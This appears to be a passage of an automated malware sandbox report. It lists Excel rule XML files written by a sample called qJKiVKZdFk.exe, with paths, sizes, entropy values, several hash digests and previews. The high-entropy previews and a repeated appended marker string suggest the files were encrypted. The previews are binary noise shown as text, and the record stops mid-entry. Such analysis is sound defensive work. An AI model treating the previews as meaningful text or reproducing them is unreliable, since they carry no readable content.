                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlW.K..@..~...s.|.P.Q.v.?#4. m.5..8.}?]1..9d..%~.y..F...".g..G...[.u=.......... j)...-G2.0...5.'r..;.^...F.... 7.D.6......2A.@.....y...$.|:..!..s...0x.f..{..|.I.....2..r.E..E<...^e1..rJ@P..6.gI. .Z..A)){..@.A...i[(.../um..@..r..L3...4..;...@..Jc..}i..N...Iu....Z.....a..X...>..n.O_+G.;....K....>(...*....t.g...+..s.Du6}....$E.....+#6...RS.#M.y~K..A.6..i..0......6R..........Y/n..y....A$T..@..wXU.4Hs.MY......D.=.1.u;.U.;c..i&0...g.d...~...T1&1u...`9*.v.9a....d`.O......sh.....<.\...f..J..7.c..}.c="96........pJ.k..........m..}...Y.....=.*H...Qs...\(...f.f...=.M.D..gR[...+y.K_....1.c.b.NoOc."._;.h..8...%.....p...,...?vQF._.v:...G..U.li...T=.GI.....Ii.O~..v>kvB\.\.@.Y..`q.......]1.D.pI?BqlQ...s....l.R.o.-YxgT.5]....v..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270017v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):851
                                                                                                                                      Entropy (8bit):7.703088694767922
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:mGa1tu6lz1mQajgh3WErtXXzsrdG7uXDqg2ssWbD:7CLlzajghsIHAD
                                                                                                                                      MD5:8900E322B4A8BB9116146097211E5790
                                                                                                                                      SHA1:4E07E5499E7E298971AFE0746F43CB03A3DD5D90
                                                                                                                                      SHA-256:642CBB5D5C0D4470E799249D9C27B0A9626E02F1EFB868A19E2852C129E2A81F
                                                                                                                                      SHA-512:2410D0FC55CD1F54598A9E406E562D8E70B294FA4588E0C3DC2449C046B0A13BE2D325EEF63F26E501B9A256AE3F4C79EDD5C2FD1EEC3BCA04B13DDC078C49A0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.wac8..'q.h.g.]W"./..Pkq...Vq$...h.k.Ti...TA......Mo.4..+On]~..C[.>.?A9|3#.X...#.i..{-Hm.&X#h..t.#....W.m2k..E.F...0....K.wq0.N..{.E..2.\".B.....FV'.......s......m....[.....D..@.........l.B.l.....k:/g.l.8...E..#[....r....u..5....p....L...*'$zi...~`ikg.......~`.m...T-.^.4...^iEY(.....^..$..(9.....d..b.u.m.34...C...,..S.G@...N.~1...G.. ..#]...K.L.....n..[%s..\.6.=\.Y.W..U..$....(A<...b.86.-.|...Q...6.K..F..y.r...../...I.k.'t.. .U)1q..M...m...k.3..qdP..2v......&.}..i..zD...1-...-..@n6.........s..Kr.....9...`..>.T,.69....+T...,..?'..&.....3:.2`../.F.....^8.9E.~...&|-j...K8.W4/."......`.a5.)r..t...,..C..........|.......z\.M...p.u...k...Cu..t...>.Y....b9/q.u...ck.P.D.*&....m.k....P.I^=.yt...!.e.~.9]*../.lI.y.Q.2Gtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270018v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):956
                                                                                                                                      Entropy (8bit):7.784759484857495
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:DVXJGdzoeJuiRqF6wu5fgbEjkOGZeNyXrtmybD:8zoeJQFvutj1OeNyb8gD
                                                                                                                                      MD5:709C48283BB055532CC836EA58035FE2
                                                                                                                                      SHA1:7ABAC5340E2DB209835EA56D44828A902D350984
                                                                                                                                      SHA-256:42C2D951BFC2840174F47C4118044DDCDE2B8E7BAE5D0A4E853179325EB27FE8
                                                                                                                                      SHA-512:59A072E67881231C4D6CAB647F1FE1B1873B966AD1E29B946806FBD5A6CDC07AD87831E98F023D5FD34C0FA862FDE93ACD1BDCFF6334A5523A5B4B1D33AD62B6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..s. TYM....>.q'y.V.s.a...z.=7...S7T.M..W.......k<..5.B\.(.G3.Um....W`..3...e..f8GF.-...(.Y......[.,D.]@x.p>...+.......U.../..x.X...W...N..$.0...}:.DK...y(.,..Z.uy e.q0...C.......,...#..d,.....X..R>.\T/<A...B...lNc.w.k.yX......./..2IE)..aQ...y..w.f1(...s..%.A..#...3N..r..+.m."....uk...k..,...EX..#..........w7D~..>[..aQA...h.\..x&..um....]..E.Q..[.....r>...FM......%.w8...-.....-.tr..S..U.8n..;.1........`..<u1.....8.^J..Y.L..!.W........!.H?.....(..kO^..,.*........}b.1..g.+.....y.........!...?Aef.7.v.a.Y....T.2.Q....w0.....z.l..vS..q...( ..W3.9W.....p...^..I....4Bf..]kh.G...[2./....!.+.*ggG.!I.........w.... .#C;.d....=.....~.......+..U..uy?4...)...8..^l.uH...%...l..;....)J.\.dR...I......]&qc.6Nu..r..R..-..JDRt...|.y....#~.e..A{....>............~U.]....6....U.3u..I3....n..h../4..A.....X.....>X.....l...f.....F:.t5.c.@..i tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270019v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1135
                                                                                                                                      Entropy (8bit):7.7648675521891715
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:KkzELx9qvYldHyMBw1r341LAZ60VOkb1v5D8j5728NcESDmwjeQx4UbD:loLx4A1aV345AZVO+DwFD70mwjeH+D
                                                                                                                                      MD5:5813FB2FBD2FFD19FF0AC48476BD34D6
                                                                                                                                      SHA1:FA9E61F0D549B2E521CAEDD72D818B06FCBE3B06
                                                                                                                                      SHA-256:EE0815C7C06AF8953188191304901F6DD516AB4FD833B73BE3C67436212D8F6F
                                                                                                                                      SHA-512:3F25B5D50F1E5D2FE31FC6280D6A12D1CB329532600E365E2DE299CE8E8050AC2822BC553738C4D9054B65AA9BC4EAB541057EC4E910623C38168B49DE35A4C2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.....O._.}....... .c8c.vc.>..spv....`4.;..c.......-&.I.O59^.4V..)...h.q.4`.......(...7..bX[+.!.\.I.|.X..5...W"...hV..~.:b...}n!.$.a../7.q..Xr..}.;....2.....T,.w.2,..F...."...mG.R...!zj.(J.Vj...mb.<.|.9T..d.z.=....d...(.PyP.....X.._.fj.Q.R.bN6X.N..M...M..-....H.......I.S...+...~.'.`.b....^T..G)1.....p....k....8..A..rK...Y...IO...A6JX..Ko.......j.\.'^..}.x.G.4.....K),].k....o%z.;g.}J.+.a..t.w..XR..n.+...u37....;.....Pf..z$6A4s..F.z.+...<..g.~.A.x.3W....ME.&....d:h......y..Sw...e../~F....J .....b.....Hy..Z..W..n..W.X.!.K...2d...8......+S....=......o......JS..TF..T.....Y.f..j.._?...)D..).......^....R+UT.+.[..54..A=.....kn..-n.`...>.)_5.n..+.a.N.v.S..Zh.+..GGJ..2..8>..Q..#.,%.......h;D..F......T}z......r..D".....,..2...'v21G9.1....jY...o.o.......^......IcN..;.9..7..g.<-0b.c..!E..?y.Y....Xe..y....E..xV.i.IJ..L...b.9..... ..._.../..H..{....s....se.IvK.v./.<E^.O$........S..B...2.y....L[...[..]...SF......].......(?.C.)D{J..C..cwFD.....i.A}..]Px..m*....B

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule310000v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1869
                                                                                                                                      Entropy (8bit):7.8841583949252385
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:MlheaAgAQu456mTa4C+02fWee6b1ozwnahTcpuoyepvHhV0cSVRlQbcE9A0lz1/9:eheanzceVxOcpDSVbQbcQ5R1/NgsD
                                                                                                                                      MD5:60A6A033CC0D95486BFFDA86FA1E1DFC
                                                                                                                                      SHA1:0992556E04DF5E42DCF3DAB2A51B84E8D1540BB8
                                                                                                                                      SHA-256:0DB769518C76AED6A91F936F810858090398AE74A70FCD9010EA318AF85FC136
                                                                                                                                      SHA-512:7F54D95C74A1EFD4CBC2223F836F62268350ECF6CAF6CD20FE52AF6FF9F4F144821326E724F3DAE9C7AA3AC197B9D27888F413085A7EF9E4F1A2D1A0BC10A62F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlz...q/.8.9&,r]8.....gT..c......G...."?....(...R............81..2...fC..._t...g{.....tq.'4.[.`.-...#.....<6...N...w;.uJtv....?..d.2.1o@.k.......K..x...w.....}.....g...n...i....d....RBT8s..'9.-.......e...i..>.d....|#.zp;&...s6@d.....b.CD..@@o.m.2.......n.M..b..M...S.7..^sZ.)..!.f%4LI......n..r.ET.<:t.`..b..P..2......h6r.-....3...P.a/..T...2#....i(..O..G.}w..D......>N1.#..9..L;..(....'l.'o.Z..J'.../.3ho.../..8/.$..o..OjWj..r-...S........#..Dt....8.7..Y#Q....bY.S=.q.}].F...Vuk....e.".J..xJ...y..z.8.....:f..2`....1+...G.w....Cli..5.0.c.X..._+.......~STq..f;.....N..T..d..m..x#..S..1..::..K*<...?C...E.`.$..\8Jk..V&..YM-.d....x..~.Y...../.../...... {#...\=n.w.UI..]F....T..G(..c...K.|r.Q!Z/..Lg.\.W%..............+........|....r:...0..x....a..d..........e...........!...x..T..a.P....<}.uA.P.{....<D.wqnU.tY'...n...t\h,=q.jB2.e..J.| /..4K..q>?.b.h9.hg....\.)..F.\.)4..T.......2..\.>.|..\.!l.x...[.'..:.............S.h;.zFuS....Si.D|...l

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320001v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1358
                                                                                                                                      Entropy (8bit):7.838821656411457
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:R9QzHDzexzQgeM9iraeryDypBiKtpu8Rc44/kbD:gjDKxzjeM9Jercu4Ktp9cRGD
                                                                                                                                      MD5:705D391003155F0C199E32FEE207311E
                                                                                                                                      SHA1:0F1E6FE0B9F9DD09AD975B403E6F9359D4678948
                                                                                                                                      SHA-256:1A1BB85C84DA98977E8F8FA303DD69B0144BDF3A7FD3F1FEB81B6BE526B8C628
                                                                                                                                      SHA-512:28D2835505C3FFF6EF21A3B853E4FDBFD07677142C4D8769C797BF862009F0EE608D6813491D0A12D10674A84E01B3ABB0B3DD1E5CA76F95D44C2A7AEDE6C3B4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmli.;.....r...zyp-.*....f..P.J.4JQ..Q.....^.../2..|....:.....o...d..=..`b.Y(=.. .....A..5...\`nex1.....N\...y...).~h$.<_./...f.......I%..G.ZzQE<........4.*.....U `'AG..%C..At.+}.....^J.....O...e...fO.......^..N..cl....'.kjT-?|..xo'.>m....h.W...y...r...j@.:H..U. ..n...Y..pu.dl...P...]Ms...g...4..qe...H.k.LI...o].5..Z...T.T.|VF@.2...d.+..a..T..3...)....7C.=T....$..%...w..$.......#..IO.*J.\...TTZ..q.X..?..r....s.W.+...1.;..!dmM.n.L..'P...m...n...1.0..X*.....XO6`..C.../....0.U.d,.cl#.y..It&&9.^T...n.P8..l|J...A..e..M.I..\........X.......v.%.m ....U;...6p\......g% ..-p....w.b.e.%.q.@9........{..q.T..E.....x.....=.*..9..zY.....k(.`=.o....a...l.s1||...EE...O....6....|Wgwd..N..vW&yS..g...k2.......c.M...6.b...K}..@........!..x"........<.b.s.c....*..o...... .N;....v.6ing.j.Hu.Y1..3F.N4`.P..==,......,....;.2.7D>X......g........-K........$^ra...w..N..N.w .&X.._...Kx....0..nY.8....M...........E.,..!.-.^$.j..R......G.-.-A.=.x..6......s..

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320002v5.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1892
                                                                                                                                      Entropy (8bit):7.887943099051687
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:YaAhLx8xIOH/toliDSgZ6jJ6PxY+aarak8snkEtGS/0D:1AFQIOH/uliei6jJ64auk8Kkio
                                                                                                                                      MD5:CE5D8F2D52A28FA15A6AC0586AE4BAC3
                                                                                                                                      SHA1:3F7623D359B6BC1024B92FDCB83FCD6084230A2B
                                                                                                                                      SHA-256:3ED11DB183E72B01465F6152255077E7378B3E7350E57DC0519C904A2D73E2EB
                                                                                                                                      SHA-512:6B7606BA499040C9D3A355E88CB27FF8B3E34813C5BFA68856F2730A6895812E94C6F3001B1C0CA5446E55787A4749AF6F1A937F5F047A599B6D6CB49A518E1E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...$...UK.l...!.~.?.....9C..t....g.F>?..s..g.y..}..bw..3......s..2q.}S%.Z.I.....Z.J..)$n.%N...+...+1..c..8..P.#...U...#..U..d<.SRc.Z..j7..Z.p@.z....E.... k'.B............aJ.c.?.{..y.|..i,.9bv..!ND7\./..9.5.J.q,...hC,.$Uh1o..Z`.5....]M.Vo.=......rg`.;.....$yJ..U...w.?u>jC~..6#u....Wk.|~t..d..Y....O..e......\.D...P8. A.*C=$M.F.....B...c;^..8LJbk..l.(0.o.3T\.~..t......\Un:..PH......6.......^,@Zd...-x{.`.@..$.F0.j......}}.]......s..S}L.}..h3./.'k.[A..#..C..........@f.D.}c......D!...f..U....s...0.....jB...*...'8.J.........].@rI. ...u."].P....1..a......@9..*.....DB...8eS.B.4.N.w..|s.%]...-mfM..b.R9....yOO&8:B....y.GX....MbW.z.....L.g....X..J..?V..l.Fcs.J....Cv.......W..[..(5.K/^.*gr..<n.0.E[.6.......n.14.nQm..N...../|....q....w.O.>.m..F$.JkU...y...4..g....r.p......<.)c..x..h.^$=Gx....7.....P...$....`..0;.a.a..;.L.gy4...o.U~....+9M7I.....X{8.....E]...-.Z..<..L.".`.../.o.:.a.7s...Og9.7pL.T./...^.5...;.>C.|.7..&.X.'k..9....).....h#E.

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320003v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1144
                                                                                                                                      Entropy (8bit):7.808340728720696
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:bYB9MS7+zDwY7M4Sw04B0Sp5QrRRpdieb/7wDmBenjEaUbD:GY77r04CmarRRpd3UDmCAFD
                                                                                                                                      MD5:0BDED1C5109C42B5FB83DC35F44A9BC6
                                                                                                                                      SHA1:5EF17D596BCBDDC41E9BAA976872D366416CFD69
                                                                                                                                      SHA-256:E6BDEC7D2EBAB80E81C7A2650E5106DBCD04E2CD45084EE8726432FAF477D699
                                                                                                                                      SHA-512:52B6706E6448D7ED13711B3DD5FD39694F18791C2D8099B2C7799C19942CCFA0B2A2F2EF53F11C7D76E625C83BD3336AC9A7B0A305FB2B880E62F3CC7DB912DB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmli...Y...r8.~....I...6.E2J.5..Z#..5.$/1.q}......;.Y...}_.1...........f..j.R..^3,......M.u.i.i.Zn.>....G.z.Jv..}....Mt^.Ed...y.'i..=.3..@.e~m.`K.(..i...^o>.....f......$u.N...7..... ....9...l^.~..lw]....U....2...&..t..*.>..PZr.F...b....A.-.R..JQ..~.4)....G..}.R...X.vQr..e&'.3q."..:..c..A^"..c.XjQ..D.|...P.S..9..:..@.M.I.?.:pvS.B2..9..Ra.<.C.x7..SA.....k#S....Z{..1".0..]QO...1..v..3j(} ...k..[].%y-..b.p..H'....?-....I...C4.......}..k..[.....iZ.b.,.&..I....P....'..)s...j6....*.q...,...qi-`.GkJ.>..S,... [..!.F...s..Q.KC.\..I.....M...e..-.(. ..+.$.:.Rb.6.O..r..|J.w*F,...5.......%..<.e}t.|.^8\..'....K.5.d...t.w.....[..J5pH.....\..p... ......(.D-.....o.....-.....}.r.s!...$z$.....J/P.lwM%.{......=...(W4.Y...l..cu.4.A..D.s3E..^.F.Y.....&..p.Gvl...R..a..Z..5...bjO..N+h.C...C.|..o.i...Syt.?.$..U.../d;.......:....kx. Y..9...V.u~.....7.y)I..+.]o.].3OH....(CPFkc......z....A.....v....;4}..PM..J..W...8.V..ymQ.FKi,l.Y......2....~!,.C..C...Q

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320004v6.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1967
                                                                                                                                      Entropy (8bit):7.879965812523533
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:+BZyVaBo0bfFNeimOTIoqAJ9nXDz48kdZL07EeLKtKEVUr9/D:Ey0Bo0j9UoqAM8kdZL077LiUB
                                                                                                                                      MD5:23C234B23E97E6DF94234AFD01B0272D
                                                                                                                                      SHA1:0B1E2BA2F7901B5AB660B4815931B04605C57DAA
                                                                                                                                      SHA-256:B092813401FCD09CA0DB3C4D5162217CFA6B06C83E4262FE9ECD0101023F6C74
                                                                                                                                      SHA-512:136F95F917A1F1C2C9451A38D5CDB46CB6C198DF12DA4DA8AEF0A5A40B22D7E5483EB8F4AC6E7F25E36F1276AAAE4FC6794464530F89074F65EFFE0382D61367
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmld..#..o.d#...L..{t..h._.P_.,S...O.b.......0.8...~....=Y\<2.n....d..QQ.3.2..Dn.^..IG.....A.e.))+....;.....f..!.Em.6".o.^.AN.m....'...h.....Z...nU.....C..O......w(x6....6.m..N...:.V.B.....95.M=Vxla...[=x*..:..5a.A..+6..3.e..%...d.... 3E..Y.O...G..8\'s...S.....-.Ct.s.......&..........!.....oj.BNW.<P......7.L..E.E.JS%.&...... .\.B.Xe..9...E......aD..D.]t....&..E.o+Y..<..{.*..a...r.$....2........R.D.J6.-...e.q.c.=0\.....;.M.@......(..Aq.........8.tZW...=.]..iz.E......a.s;....x......MJ%.P.\.6... .9I9_.~U....... |F.,.oz.m..g.C....b.<...{....=.f..\.}.G...27.^....Y...9.... .o..l....o..D.._h..Vx.gY.l>_k.<..+\...& ....(...,.).M.........99.K....o3.Oso../K<Qr..Y.z..t-.h.......[.J}....5.P....DVo\..!.AAt...[..bQ..r...S.....dO%.[..E.......D......y.'.w.......:C.(\.AA.....0.s..W.....<'7.qO..(w...<Y.x...m.82&]2.....36..x...+.u..!.G..bN..K.....Xd.`..S.%$...m6.s...F(..A.5...2^...hN.y..........5...j...R.^.i...%l.),....D>.Y..r....sJ.u.i.y.le.3...

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320005v4.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1427
                                                                                                                                      Entropy (8bit):7.85549183977059
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:opXLUDW3nFq3yyshDnalWyY+oK6p1h8m2j4NHJr8MbnRvFPuMkoZbfHUT85j/evg:cXADW3nF1BhTalWTK81hF2jcJr8YRvF3
                                                                                                                                      MD5:4E1E60D592B6B6ECEEACD37519B6B50D
                                                                                                                                      SHA1:7F8B3F3CF971F7C67BF26216A33DFEB682BB0773
                                                                                                                                      SHA-256:8E44D36AFB6B6610F638E22212813F87CF144EAADA2B1CAB62788AB930E3B910
                                                                                                                                      SHA-512:2C460697E5CA5B57EA2E041991591AF7FF4AE01F3D55505ECDEA901F29F5798DD6F33BC95B90249294C8181292B58191652367571CF3FB8EA8942F533F5512EB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlU.......G.0'.,.E...PR.u....^1.f...:.\[x...(..HaU.......IDG.....2..s..A.~wP>....2.....>.e...........,....T.8-.A....*..M...d@.#U.G.*........).`4..!...Y..L..."..mT.j.........N.i.al...s.<.....y.J"...A9=.....$,I2#...kb9.Z...NE..`..H..~4.R....7%?>.5."...C......Z......?.C...a{.g6MZ....AA.....\R..\..;.XA8...1I..(...Z....$P.Y....U....3pV...N......x....5.............0...f.s....j*...`Dbr.?.9p.1.F.._.rM.3...D...AW.8e....S..PM.L.g...7P.1m7&.t&p......9#":..v*w....U...h.S>....l.a.K.t........0i.*.l.wc.YR....y..t.G....t....C.y....?...D..dsK....n?...baz...v..]F....{iTVc..P.7.-..;...ci....\.5....E1...E._d.."{....&..?..+..H......a.y....c.....9....[D.7..j....Q......<.D....GE....w..d.jo..`.l.F..s..)....PHI..9.b...5...K..E.......2.5..a...I...o...0>.]$"..Du.L........~m'!._..i..=t.j1.2.V.`[.Q.}Z.bl...;s.7.;..M.a..~..J..&...z..K. ..."..y.on.s4.".mFQe\R1..d...^-..tA..S.>.o........4H0....=..._u.3.Rs...ry*....M!.b4i.\T0-eI&....y...>b.S.TJ....H...J..<s.R..6.].}.v..l.q_.A

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320006v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1528
                                                                                                                                      Entropy (8bit):7.865995121399897
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:pta0RUoKxwhQdNP937FzBrxFCnbi9mwoHhNflqg4fIbLdlJ+etWqWKsr9ZYbD:pDRz43fiNMPAx+ekqUZCD
                                                                                                                                      MD5:DA46D66E7BA47A295B9368E7652D5352
                                                                                                                                      SHA1:4DD520AD6B1DF703E921E9896F14E30AC268A68C
                                                                                                                                      SHA-256:68588F2791BA7859E2E0FC5E9D26E3DFE51C979AD281F6528A196B6FC33D7338
                                                                                                                                      SHA-512:29BCA2D61B34DD153D64CE5460561E97ED0D2E4286425500F957D91A60DBAB8CF836D4E05BE3B7B981106A0FDC0DCEB2A26CBFBDC6EDA17A73F23F0EF8FACA5F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml'E...-^.T..qB.4tT....Z\.{Fg5ix^y.8ci.=........`M%.`{..B..o....e4.....h.U.......{.=.}D%t.....?...$.':..UX.$...O..*4;......8..$.`.}.a..c`m.tT.Tb[/..N.pK^...Q..tZ..<.i.a.3.....\...N.>..;..\2.y.-....#(.z..j.fu.{.-,E ......I.S.NO..yr[.)..u...;.C....9. !...W...h.8..?U.T..O....A..m..6.%.....e.0O @..#>......+.Lgv..mw..mJ...B...I.....w/...W>(...3.^.}iO....[...M#].VX....>...?j..4vj.D..A!5........S.n.[....!.6".h..`W.O|..K6@b.C...[...*L.....Bo....\.}!.g..o7.+.+....c6.A..k.'F._.S.q!r.1}....g].....A.>n[..u.V...f.z.3...'.....A.."e9Wk.Wk...4..C.;...$G.."...d......K.....y>...h.nX....].H..bA..IGB.....,8....0.F..F...zG..}p.%.jA)....{l.KG.o......,......8....]K;..g.x..n...I.BO.`.. ..M....L.....$.... ..h..G.w. ='L}..+...*..C.+]s.d.&z...V.;T-..T._!L..g6#.kX...d..N.@U.V...e.....z....+.h....=...,v...?.y.Z.......j.....L......7..D1.....O_:...(b\.x..?.z.&+m5F..........m.p....a...W..U...>\|.z_.MS.R......4.{..g.....`$.....2o.. .%....e.......^....k.. ...#..e:

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320007v2.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1233
                                                                                                                                      Entropy (8bit):7.807911545526119
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:XtWDKEsXA2kuV2JLEuEa2AFDq0WLjNCRU1N5nNi24FJPp4UqkMbD:UD4bUJYuEaTDqdA4NifzPp4UqkGD
                                                                                                                                      MD5:D665DC753B32994F1631F70BF38AD0D9
                                                                                                                                      SHA1:A78A363F389E616166CD7DB80184269DE72B9C5E
                                                                                                                                      SHA-256:7C178D4C90328F9DB300AEDA3D2BFAB73D1D7042699A3A0BF52599387FAB6F49
                                                                                                                                      SHA-512:E8CEE69EC035034FA3C9FF6CA018AD673A146E468EFEEAE5B1794B376E4815F80BCF316A5F8D49F825778C5CAC9A8B3D1D36F6538721E566BDD1958C7FE96C0C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...m...........w.U..0.kJ.kj:......5.0!|<uZ.X&..~F..4f...(.6\....Dr...X..`Bl .h;.Z.I..Y7.......l.v;c.y...U.._...:s.f.u.....H...=...QD...._s...............d.|R..D...um.0.D./.E.._E.....Y.....;.@...d>.*..\.m..`&.49c..Cxm..F2..w.v..V.Y%:b1.N.[.|.Pl..#8.*..'R.{:..jW...3.Z.X*.....T_-.0.w}.!).[.}.w...^....E../.Rj\".\..U...ME/.8..Q.mz...|.R5.l..tU.Q8...Z6..#.l.b......s_.>...H.=1[.@......?..u...V.......%..[)..,e.^..K.......<....8...kuz..C..8.DUE[.<.v~..9.z.WI.G......*..=.K....,..il....=3...x..r..^#w.)Y7.....}...{dohV.Q.....S..?.=.V...W.].o5;....z.. V<@D...m.Lj...u.O..2%]..\j.....K.;..E.M.e(r...x...t.b.....7...U.......75....R>...Yj...'w.........N.DPr`..~.....r...v...+.".......A."f+\.n.....a..m.B.2..%.'c.u..tcc.~..P.bm.X|.....i8.Yq........2=.r...Jib...>..^....(.p..,....VUAw=Yb..L.}.>.*.A/.r+...>.H>...wgkZ...}..lo9..g..V.f..`.Z.6.....Nw........3.+.@T..........0.j...T....=....\|...>pT..kI>g&.]..c...,..KF..n...C.....Cv.v..>.o..w,..@Z..6.H....

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320009v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):866
                                                                                                                                      Entropy (8bit):7.762238185773799
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Ff32BkphtolkhqY95ec88YTWk1b1H+CmVShPyGevhY1ejbD:N3Ggoa15eXJbpU49eqWD
                                                                                                                                      MD5:C4E024DA0A080B848570F31A58BD1F02
                                                                                                                                      SHA1:BE081CB8CE9DE36172BDDA30A4AE85FCCBBBAB2E
                                                                                                                                      SHA-256:A88F793169AE4376813F8477B7EF008D1D45868050E282901EC2CA8162745593
                                                                                                                                      SHA-512:0F8A0120E01B04DA60056286BA1165FB91DA15DD1A44DE9A38E26934AEB8B290FE44B921C8D0D9274B6659A56150ECE179D62F6DD23E9456CE919D301F2819C1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlg.Y..aA.N.}...)..../..t...R.9...K.$......_<..P.>o..R.M`.i....+.9.yPp|.O..............K|...y...A..|%7.`e.. ..o....a#..6.....-.=.*|.."z.d.)4!.D..>...uA.6...H..$.c.c..[X..2/5uS.'..OR.`.T).~.......#.......H)/g...,4..,..!.T.W.....J..R1....hx.V/...O#4...5.~i5.@k......?2....h`n.....s!E..l.......I........f..1.x...s....M.=!PS.~...H3..pa...K..{;7K|...<.L)+..r.Ka&o.@lO...nR._H...........b.c....jV.).2.....G.c[......hk.....G$J.E..7...+...<......D...n.v3.AP..m..cj{6.i7...0..\k.M...iz..S..>.n.K.rEu=....C.....5.....2..........w6.Nt)5...7......f6....H.v.+'6-+..}.V...q.o.....B......f#..........uJ..;.z......j.H.d...2....y.-....k.f.zFN......\`up.....6.8.........D..!,....>n...WC"..*..X.tj.......":..UU.UU.nO..;:`.SH......kl.!<......s...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule320016v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):901
                                                                                                                                      Entropy (8bit):7.7484905996723255
                                                                                                                                      Encrypted:false
